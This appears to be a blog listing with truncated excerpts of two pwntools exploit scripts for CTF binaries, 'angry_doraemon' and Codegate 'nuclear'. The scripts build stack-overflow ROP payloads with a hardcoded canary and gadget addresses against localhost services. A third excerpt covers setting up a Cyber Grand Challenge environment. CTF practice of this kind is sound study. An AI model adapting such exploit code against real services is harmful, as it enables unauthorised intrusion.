
angry_doraemon exploit only from pwntools

    from pwn import *

    elf = ELF('./angry')
    rop = ROP(elf)

    read_plt,write_plt = elf.plt['read'], elf.plt['write']
    read_got,write_got = elf.got['read'], elf.got['write']

    conn = remote('localhost', 8888)
    sleep(2.3)
    payload = "4\n"
    conn.send(payload)
    sleep(0.3)

    canary = 0x6df37b00
    ppppr = 0x080495BC
    boom = 0x08048FC6

    payload = "y111111111"
    payload += p32(canary)
    payload += "AAAA"
    payload += "AAAA"
    payload += "..
codegate nuclear, using pwn tools

    from pwn import *

    elf = ELF("./nuclear")
    rop = ROP(elf)

    recv_plt,send_plt = elf.plt['recv'], elf.plt['send']
    recv_got,send_got = elf.got['recv'], elf.got['send']

    ppppr = 0x0804917C
    boom = 0x08048B5B

    print "read_plt : " + str(hex(recv_plt))
    print "send_plt : " + str(hex(send_plt))
    print "read_got : " + str(hex(recv_got))
    print "send_got : " + str(hex(send_got))

    conn = remote('localhost', 1129)

    payload ..
Setting up a CGC (Cyber Grand Challenge) environment

Many CGC challenges appeared at DEFCON 2016, so I am posting how I set up the environment at the time. CGC has to be set up using a tool called vagrant. I did it on Windows.

https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/pwnable/cybergrandsandbox
I followed the write-up at the address above.

http://repo.cybergrandchallenge.com/boxes/
Download the Vagrantfile from here.

https://www.vagrantup.com/downloads.html
Download the Windows version of vagrant from here.

https://www.virtualbox.org/
From here, virtual ..